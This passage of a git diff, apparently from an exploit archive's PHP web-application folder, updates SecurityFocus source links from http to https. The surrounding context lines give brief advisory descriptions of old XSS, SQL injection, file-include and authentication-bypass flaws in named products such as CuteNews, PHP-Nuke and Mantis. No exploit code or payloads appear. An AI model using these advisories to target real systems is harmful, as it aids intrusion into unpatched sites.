stored with a predictable name in a known web accessible location. diff --git a/exploits/php/webapps/24227.txt b/exploits/php/webapps/24227.txt index 9076ba006..ef130cec6 100644 --- a/exploits/php/webapps/24227.txt +++ b/exploits/php/webapps/24227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10588/info +source: https://www.securityfocus.com/bid/10588/info SqWebMail is reported to be prone to an email header HTML injection vulnerability. This issue presents itself due to a failure of the application to properly sanitize user-supplied email header strings. diff --git a/exploits/php/webapps/24231.txt b/exploits/php/webapps/24231.txt index e6bc1217a..0ac3909c7 100644 --- a/exploits/php/webapps/24231.txt +++ b/exploits/php/webapps/24231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10592/info +source: https://www.securityfocus.com/bid/10592/info It is reported that ArbitroWeb is susceptible to a cross-site scripting vulnerability in its rawURL URI parameter. diff --git a/exploits/php/webapps/24232.txt b/exploits/php/webapps/24232.txt index 74d9073b2..e5c0476ae 100644 --- a/exploits/php/webapps/24232.txt +++ b/exploits/php/webapps/24232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10595/info +source: https://www.securityfocus.com/bid/10595/info PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting, HTML injection, and SQL injection attacks. diff --git a/exploits/php/webapps/24234.html b/exploits/php/webapps/24234.html index 62e6f4dba..d86e79b49 100644 --- a/exploits/php/webapps/24234.html +++ b/exploits/php/webapps/24234.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10602/info +source: https://www.securityfocus.com/bid/10602/info VBulletin is reported prone to an HTML injection vulnerability. This issue affects the 'newreply.php' and 'newthread.php' scripts. diff --git a/exploits/php/webapps/24235.txt b/exploits/php/webapps/24235.txt index 5446585a7..2f5ff0d0e 100644 --- a/exploits/php/webapps/24235.txt +++ b/exploits/php/webapps/24235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10605/info +source: https://www.securityfocus.com/bid/10605/info Newsletter ZWS is reported prone to an administrative interface authentication bypass vulnerability. The vulnerability exists due to a design error in the implementation of the authentication system for the interface. The flaw allows a user to set their privileges through a URI parameter passed to the 'admin.php' script. diff --git a/exploits/php/webapps/24238.txt b/exploits/php/webapps/24238.txt index 39afb6405..44a7c84e1 100644 --- a/exploits/php/webapps/24238.txt +++ b/exploits/php/webapps/24238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10620/info +source: https://www.securityfocus.com/bid/10620/info It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24239.txt b/exploits/php/webapps/24239.txt index 02964e902..30e47bfd2 100644 --- a/exploits/php/webapps/24239.txt +++ b/exploits/php/webapps/24239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10620/info +source: https://www.securityfocus.com/bid/10620/info It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24240.txt b/exploits/php/webapps/24240.txt index f7adfbc26..a69105527 100644 --- a/exploits/php/webapps/24240.txt +++ b/exploits/php/webapps/24240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10620/info +source: https://www.securityfocus.com/bid/10620/info It is reported that CuteNews is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24241.txt b/exploits/php/webapps/24241.txt index c9b8b2039..6c90975f2 100644 --- a/exploits/php/webapps/24241.txt +++ b/exploits/php/webapps/24241.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10622/info +source: https://www.securityfocus.com/bid/10622/info PowerPortal is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24255.txt b/exploits/php/webapps/24255.txt index 214ef689d..29067c9ce 100644 --- a/exploits/php/webapps/24255.txt +++ b/exploits/php/webapps/24255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10670/info +source: https://www.securityfocus.com/bid/10670/info JAWS is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24256.php b/exploits/php/webapps/24256.php index 996e3da71..0bc87c2ca 100644 --- a/exploits/php/webapps/24256.php +++ b/exploits/php/webapps/24256.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10670/info +source: https://www.securityfocus.com/bid/10670/info JAWS is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24257.txt b/exploits/php/webapps/24257.txt index 3980295fd..23109d528 100644 --- a/exploits/php/webapps/24257.txt +++ b/exploits/php/webapps/24257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10670/info +source: https://www.securityfocus.com/bid/10670/info JAWS is reported prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data. The following specific issues can affect the application: diff --git a/exploits/php/webapps/24274.pl b/exploits/php/webapps/24274.pl index 6cba4d17f..57a457570 100755 --- a/exploits/php/webapps/24274.pl +++ b/exploits/php/webapps/24274.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10701/info +source: https://www.securityfocus.com/bid/10701/info The 'viewtopic.php' phpBB script is prone to a remote PHP script injection vulnerability because the application fails to properly sanitize user-supplied URI parameters before using them to construct dynamically generated web pages. diff --git a/exploits/php/webapps/24279.txt b/exploits/php/webapps/24279.txt index d8c0580b3..ec665974e 100644 --- a/exploits/php/webapps/24279.txt +++ b/exploits/php/webapps/24279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10718/info +source: https://www.securityfocus.com/bid/10718/info It is reported that Moodle is susceptible to a cross-site scripting vulnerability in the 'help.php' script. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content. diff --git a/exploits/php/webapps/24289.c b/exploits/php/webapps/24289.c index 7f3c7b0b1..0ceed8257 100644 --- a/exploits/php/webapps/24289.c +++ b/exploits/php/webapps/24289.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10746/info +source: https://www.securityfocus.com/bid/10746/info Kleinanzeigen is prone to a file include vulnerability. This issue could allow a remote attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. diff --git a/exploits/php/webapps/24290.txt b/exploits/php/webapps/24290.txt index 63355a7b8..f11fc821e 100644 --- a/exploits/php/webapps/24290.txt +++ b/exploits/php/webapps/24290.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10750/info +source: https://www.securityfocus.com/bid/10750/info CutePHP is reported prone to an HTML injection vulnerability. diff --git a/exploits/php/webapps/24291.txt b/exploits/php/webapps/24291.txt index ea57f5e01..db8d549c8 100644 --- a/exploits/php/webapps/24291.txt +++ b/exploits/php/webapps/24291.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10756/info +source: https://www.securityfocus.com/bid/10756/info Outblaze Webmail is reported prone to an-HTML injection vulnerability because the application fails to properly sanitize user-supplied HTML email content. diff --git a/exploits/php/webapps/24292.txt b/exploits/php/webapps/24292.txt index e057645eb..aa36c6873 100644 --- a/exploits/php/webapps/24292.txt +++ b/exploits/php/webapps/24292.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10757/info +source: https://www.securityfocus.com/bid/10757/info Print Topic Mod is reportedly affected by a remote SQL injection vulnerability in the 'printview.php' script. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24296.txt b/exploits/php/webapps/24296.txt index fe532d294..d99e07512 100644 --- a/exploits/php/webapps/24296.txt +++ b/exploits/php/webapps/24296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10760/info +source: https://www.securityfocus.com/bid/10760/info Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. diff --git a/exploits/php/webapps/24301.html b/exploits/php/webapps/24301.html index b392f8d04..fea75dadf 100644 --- a/exploits/php/webapps/24301.html +++ b/exploits/php/webapps/24301.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10774/info +source: https://www.securityfocus.com/bid/10774/info It has been reported that Mensajeitor Tag Board is affected by an authentication bypass vulnerability. This issue is due to a failure of the application to properly handle authentication controls. diff --git a/exploits/php/webapps/24303.txt b/exploits/php/webapps/24303.txt index 2bb35b1c8..3ed9582e4 100644 --- a/exploits/php/webapps/24303.txt +++ b/exploits/php/webapps/24303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10776/info +source: https://www.securityfocus.com/bid/10776/info It is reported that HelpBox is susceptible to multiple SQL injection vulnerabilities. This issue is due to improper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24306.txt b/exploits/php/webapps/24306.txt index 7675d7369..bff7121ef 100644 --- a/exploits/php/webapps/24306.txt +++ b/exploits/php/webapps/24306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10792/info +source: https://www.securityfocus.com/bid/10792/info EasyWeb is prone to a directory traversal vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. The issue occurs if a remote attacker sends a request to the 'ew_filemanager' script for a file containing directory traversal character sequences to the application. diff --git a/exploits/php/webapps/24307.txt b/exploits/php/webapps/24307.txt index ccd3066b1..64a4b3db0 100644 --- a/exploits/php/webapps/24307.txt +++ b/exploits/php/webapps/24307.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10793/info +source: https://www.securityfocus.com/bid/10793/info It is reported that PostNuke may disclose administrator authentication credentials to remote attackers. This issue presents itself because the application fails to remove the install script 'install.php' after installation. This can allow an attacker to gain unauthorized access to the content management system. The attacker may then carry out further attacks against other users or the computer running the vulnerable application. diff --git a/exploits/php/webapps/24311.txt b/exploits/php/webapps/24311.txt index f36b48d96..9b2900c0a 100644 --- a/exploits/php/webapps/24311.txt +++ b/exploits/php/webapps/24311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10795/info +source: https://www.securityfocus.com/bid/10795/info EasyIns Stadtportal is reported prone to a vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer. diff --git a/exploits/php/webapps/24324.txt b/exploits/php/webapps/24324.txt index 1597c55f7..bf3119e1e 100644 --- a/exploits/php/webapps/24324.txt +++ b/exploits/php/webapps/24324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10802/info +source: https://www.securityfocus.com/bid/10802/info PostNuke is reported prone to a cross-site scripting vulnerability. This issue affects the 'title' parameter of 'Reviews' script. Exploitation of this issue could allow for theft of cookie-based authentication credentials. Other attacks are also possible. diff --git a/exploits/php/webapps/24329.txt b/exploits/php/webapps/24329.txt index a3c2de18f..f57bb3b67 100644 --- a/exploits/php/webapps/24329.txt +++ b/exploits/php/webapps/24329.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10821/info +source: https://www.securityfocus.com/bid/10821/info Multiple vulnerabilities are reported to exist in the application due to insufficient sanitization of user-supplied data. The issues include various instances of SQL injection and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/24330.txt b/exploits/php/webapps/24330.txt index 161473cd2..74e95a64f 100644 --- a/exploits/php/webapps/24330.txt +++ b/exploits/php/webapps/24330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10821/info +source: https://www.securityfocus.com/bid/10821/info Multiple vulnerabilities are reported to exist in the application due to insufficient sanitization of user-supplied data. The issues include various instances of SQL injection and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/24331.txt b/exploits/php/webapps/24331.txt index 415bf7641..f4ca8c0c2 100644 --- a/exploits/php/webapps/24331.txt +++ b/exploits/php/webapps/24331.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10822/info +source: https://www.securityfocus.com/bid/10822/info A cross-site scripting vulnerability is reported to affect Phorum. This issue affects the 'search.php' script. As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. diff --git a/exploits/php/webapps/24332.txt b/exploits/php/webapps/24332.txt index ac506d0e7..f0147e6b1 100644 --- a/exploits/php/webapps/24332.txt +++ b/exploits/php/webapps/24332.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10824/info +source: https://www.securityfocus.com/bid/10824/info Comersus Cart is reportedly affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24333.txt b/exploits/php/webapps/24333.txt index 2d408ba7c..590a054e3 100644 --- a/exploits/php/webapps/24333.txt +++ b/exploits/php/webapps/24333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10825/info +source: https://www.securityfocus.com/bid/10825/info Reportedly Verylost lostBook is affected by an HTML injection vulnerability in its message entry functionality. This issue is due to a failure of the application to properly validate and sanitize user-supplied input before including it in dynamically generated web page content. diff --git a/exploits/php/webapps/24334.txt b/exploits/php/webapps/24334.txt index be64acf4c..07308a74f 100644 --- a/exploits/php/webapps/24334.txt +++ b/exploits/php/webapps/24334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10826/info +source: https://www.securityfocus.com/bid/10826/info JAWS is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the controlpanel.php script due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24340.txt b/exploits/php/webapps/24340.txt index 180ebabce..d8740754a 100644 --- a/exploits/php/webapps/24340.txt +++ b/exploits/php/webapps/24340.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10835/info +source: https://www.securityfocus.com/bid/10835/info A vulnerability is reported for PowerPortal which may make it prone to HTML injection attacks. The problem is said to occur due to a lack of sufficient sanitization performed on private message data. diff --git a/exploits/php/webapps/24341.txt b/exploits/php/webapps/24341.txt index 623449276..bf7e874f7 100644 --- a/exploits/php/webapps/24341.txt +++ b/exploits/php/webapps/24341.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10836/info +source: https://www.securityfocus.com/bid/10836/info It is reported that Fusion News is affected by an administrator command execution vulnerability. This issue is due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24348.txt b/exploits/php/webapps/24348.txt index 9ca081b1e..3dd588a6a 100644 --- a/exploits/php/webapps/24348.txt +++ b/exploits/php/webapps/24348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10856/info +source: https://www.securityfocus.com/bid/10856/info It is reported that eNdonesia is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content. diff --git a/exploits/php/webapps/24349.txt b/exploits/php/webapps/24349.txt index 586b44223..5d66a5a90 100644 --- a/exploits/php/webapps/24349.txt +++ b/exploits/php/webapps/24349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10861/info +source: https://www.securityfocus.com/bid/10861/info PHP-Nuke is reported prone to an access control bypass vulnerability. diff --git a/exploits/php/webapps/24356.txt b/exploits/php/webapps/24356.txt index 3894d40b7..f718c5404 100644 --- a/exploits/php/webapps/24356.txt +++ b/exploits/php/webapps/24356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10884/info +source: https://www.securityfocus.com/bid/10884/info It is reported that Moodle is vulnerable to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content. diff --git a/exploits/php/webapps/24357.txt b/exploits/php/webapps/24357.txt index ecf5b539d..f4cf08f5a 100644 --- a/exploits/php/webapps/24357.txt +++ b/exploits/php/webapps/24357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10885/info +source: https://www.securityfocus.com/bid/10885/info PluggedOut Blog is reported prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/24359.php b/exploits/php/webapps/24359.php index df3341330..8de996b08 100644 --- a/exploits/php/webapps/24359.php +++ b/exploits/php/webapps/24359.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10891/info +source: https://www.securityfocus.com/bid/10891/info A vulnerability is reported to exist in YaPiG that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue exists due to a lack if sanitization of user-supplied data. diff --git a/exploits/php/webapps/24367.txt b/exploits/php/webapps/24367.txt index d338e881b..e490ef8f0 100644 --- a/exploits/php/webapps/24367.txt +++ b/exploits/php/webapps/24367.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10920/info +source: https://www.securityfocus.com/bid/10920/info IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. It is reported that these issues may be exploited by a remote attacker to conduct SQL Injection, Account Manipulation, Cross-site Scripting, Information disclosure, Local file system access, and other attacks. Few details regarding the specific vulnerabilities are known. diff --git a/exploits/php/webapps/24372.txt b/exploits/php/webapps/24372.txt index e7f07e298..73b9ad7dc 100644 --- a/exploits/php/webapps/24372.txt +++ b/exploits/php/webapps/24372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10948/info +source: https://www.securityfocus.com/bid/10948/info It is reported that CuteNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24373.txt b/exploits/php/webapps/24373.txt index 5b8d9dc01..244d613bd 100644 --- a/exploits/php/webapps/24373.txt +++ b/exploits/php/webapps/24373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10954/info +source: https://www.securityfocus.com/bid/10954/info PScript PForum is reported prone to a HTML injection vulnerability. The vulnerability presents itself due to a lack of sufficient sanitization performed on data submitted through input fields of the PForum user profile form. diff --git a/exploits/php/webapps/24375.txt b/exploits/php/webapps/24375.txt index fa002d66a..db4109bdf 100644 --- a/exploits/php/webapps/24375.txt +++ b/exploits/php/webapps/24375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10960/info +source: https://www.securityfocus.com/bid/10960/info RaXnet Cacti is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the auth_login.php script due to a failure of the application to properly sanitize user-supplied "username" URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24377.txt b/exploits/php/webapps/24377.txt index a530b8184..a329ef5fc 100644 --- a/exploits/php/webapps/24377.txt +++ b/exploits/php/webapps/24377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24378.txt b/exploits/php/webapps/24378.txt index 837a1d5b0..ba3eaf689 100644 --- a/exploits/php/webapps/24378.txt +++ b/exploits/php/webapps/24378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24379.txt b/exploits/php/webapps/24379.txt index 022dbb594..69b1463c9 100644 --- a/exploits/php/webapps/24379.txt +++ b/exploits/php/webapps/24379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24380.txt b/exploits/php/webapps/24380.txt index 945ddf9a8..dafa904fe 100644 --- a/exploits/php/webapps/24380.txt +++ b/exploits/php/webapps/24380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24381.txt b/exploits/php/webapps/24381.txt index f9f6eac47..33db810a8 100644 --- a/exploits/php/webapps/24381.txt +++ b/exploits/php/webapps/24381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24382.txt b/exploits/php/webapps/24382.txt index be77f7440..1fdffed12 100644 --- a/exploits/php/webapps/24382.txt +++ b/exploits/php/webapps/24382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24383.php b/exploits/php/webapps/24383.php index ba20833a1..1d7820dcf 100644 --- a/exploits/php/webapps/24383.php +++ b/exploits/php/webapps/24383.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10968/info +source: https://www.securityfocus.com/bid/10968/info A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function. diff --git a/exploits/php/webapps/24384.txt b/exploits/php/webapps/24384.txt index d9cd2b857..b74f3a0e5 100644 --- a/exploits/php/webapps/24384.txt +++ b/exploits/php/webapps/24384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10974/info +source: https://www.securityfocus.com/bid/10974/info It is reported that PHP-Fusion is susceptible to a database backup information disclosure vulnerability. An anonymous remote attacker may be able to download a complete database backup from the server. Authentication would not be required. diff --git a/exploits/php/webapps/24389.txt b/exploits/php/webapps/24389.txt index 1ee530783..ddd02022d 100644 --- a/exploits/php/webapps/24389.txt +++ b/exploits/php/webapps/24389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10992/info +source: https://www.securityfocus.com/bid/10992/info An HTML injection vulnerability is reported in Sympa. The problem occurs due to a failure of the application to properly sanitize user-supplied input data. diff --git a/exploits/php/webapps/24390.txt b/exploits/php/webapps/24390.txt index beb0bf30b..7369d1966 100644 --- a/exploits/php/webapps/24390.txt +++ b/exploits/php/webapps/24390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10993/info +source: https://www.securityfocus.com/bid/10993/info Mantix is reportedly susceptible to a remote server-side script execution vulnerability. This vulnerability only presents itself when PHP is configured on the hosting computer with 'register_globals = on'. diff --git a/exploits/php/webapps/24391.txt b/exploits/php/webapps/24391.txt index c8653ac5e..26184bbb0 100644 --- a/exploits/php/webapps/24391.txt +++ b/exploits/php/webapps/24391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10994/info +source: https://www.securityfocus.com/bid/10994/info Mantis is a web-based bug tracking system. It is written in PHP and supported by a MySQL database. diff --git a/exploits/php/webapps/24392.php b/exploits/php/webapps/24392.php index b23c0fe7a..45278ac03 100644 --- a/exploits/php/webapps/24392.php +++ b/exploits/php/webapps/24392.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10995/info +source: https://www.securityfocus.com/bid/10995/info Mantis is reportedly susceptible to a vulnerability in its signup process allowing mass email attacks. diff --git a/exploits/php/webapps/24393.txt b/exploits/php/webapps/24393.txt index d09fe5177..f7f06c4b5 100644 --- a/exploits/php/webapps/24393.txt +++ b/exploits/php/webapps/24393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10996/info +source: https://www.securityfocus.com/bid/10996/info MyDMS is reportedly susceptible to both a directory traversal vulnerability and an SQL injection vulnerability. diff --git a/exploits/php/webapps/24399.txt b/exploits/php/webapps/24399.txt index 9caf10b1e..67298667c 100644 --- a/exploits/php/webapps/24399.txt +++ b/exploits/php/webapps/24399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11009/info +source: https://www.securityfocus.com/bid/11009/info It is reported that PhotoADay is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24403.txt b/exploits/php/webapps/24403.txt index dbff7754f..c51f95a8b 100644 --- a/exploits/php/webapps/24403.txt +++ b/exploits/php/webapps/24403.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11013/info +source: https://www.securityfocus.com/bid/11013/info It is reported that eGroupWare is susceptible to multiple cross-site scripting and HTML injection vulnerabilities. diff --git a/exploits/php/webapps/24405.txt b/exploits/php/webapps/24405.txt index d316df04e..88259bc74 100644 --- a/exploits/php/webapps/24405.txt +++ b/exploits/php/webapps/24405.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11024/info +source: https://www.securityfocus.com/bid/11024/info It is reported that Plesk Reloaded may be affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24410.txt b/exploits/php/webapps/24410.txt index d55511497..d11f5f60a 100644 --- a/exploits/php/webapps/24410.txt +++ b/exploits/php/webapps/24410.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11038/info +source: https://www.securityfocus.com/bid/11038/info PHP Code Snippet Library is reported prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24415.txt b/exploits/php/webapps/24415.txt index 088fababf..38687637d 100644 --- a/exploits/php/webapps/24415.txt +++ b/exploits/php/webapps/24415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11064/info +source: https://www.securityfocus.com/bid/11064/info Reportedly the XOOPS Dictionary Module by Nagle is affected by multiple cross-site scripting vulnerabilities. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24424.txt b/exploits/php/webapps/24424.txt index 6227ac124..19104959d 100644 --- a/exploits/php/webapps/24424.txt +++ b/exploits/php/webapps/24424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11086/info +source: https://www.securityfocus.com/bid/11086/info DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. diff --git a/exploits/php/webapps/24425.txt b/exploits/php/webapps/24425.txt index 6d5c27f48..1bf3fd37d 100644 --- a/exploits/php/webapps/24425.txt +++ b/exploits/php/webapps/24425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11088/info +source: https://www.securityfocus.com/bid/11088/info It is reported that phpWebSite is susceptible to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/24565.txt b/exploits/php/webapps/24565.txt index f15a3d300..e24c876f6 100644 --- a/exploits/php/webapps/24565.txt +++ b/exploits/php/webapps/24565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11095/info +source: https://www.securityfocus.com/bid/11095/info MailWorks Professional is reported prone to an authentication bypass vulnerability. diff --git a/exploits/php/webapps/24566.txt b/exploits/php/webapps/24566.txt index 0a811bd92..2322be339 100644 --- a/exploits/php/webapps/24566.txt +++ b/exploits/php/webapps/24566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11097/info +source: https://www.securityfocus.com/bid/11097/info It is reported that CuteNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24575.txt b/exploits/php/webapps/24575.txt index 9d2d94316..82437785c 100644 --- a/exploits/php/webapps/24575.txt +++ b/exploits/php/webapps/24575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11124/info +source: https://www.securityfocus.com/bid/11124/info PSNews is a Web application that is implemented in PHP. diff --git a/exploits/php/webapps/24582.txt b/exploits/php/webapps/24582.txt index e17b1ddf5..435d16365 100644 --- a/exploits/php/webapps/24582.txt +++ b/exploits/php/webapps/24582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11133/info +source: https://www.securityfocus.com/bid/11133/info Regulus is reported prone to an information disclosure vulnerability. It is reported that a specified user/customer password hash is contained in a hidden tag of the 'Update Your Password' action page. diff --git a/exploits/php/webapps/24583.txt b/exploits/php/webapps/24583.txt index 859c18483..a321b3830 100644 --- a/exploits/php/webapps/24583.txt +++ b/exploits/php/webapps/24583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11134/info +source: https://www.securityfocus.com/bid/11134/info Regulus is reported prone to an information disclosure vulnerability. It is reported that it is possible to view a target users connection statistics without requiring valid credentials. diff --git a/exploits/php/webapps/24585.txt b/exploits/php/webapps/24585.txt index ba2c157bc..76f676a67 100644 --- a/exploits/php/webapps/24585.txt +++ b/exploits/php/webapps/24585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11146/info +source: https://www.securityfocus.com/bid/11146/info BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/24587.txt b/exploits/php/webapps/24587.txt index ac002896e..08ec876d7 100644 --- a/exploits/php/webapps/24587.txt +++ b/exploits/php/webapps/24587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11148/info +source: https://www.securityfocus.com/bid/11148/info Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI parameters. diff --git a/exploits/php/webapps/24601.txt b/exploits/php/webapps/24601.txt index 08d9661f0..3bf8701da 100644 --- a/exploits/php/webapps/24601.txt +++ b/exploits/php/webapps/24601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11191/info +source: https://www.securityfocus.com/bid/11191/info BBS E-Market Professional is reported prone 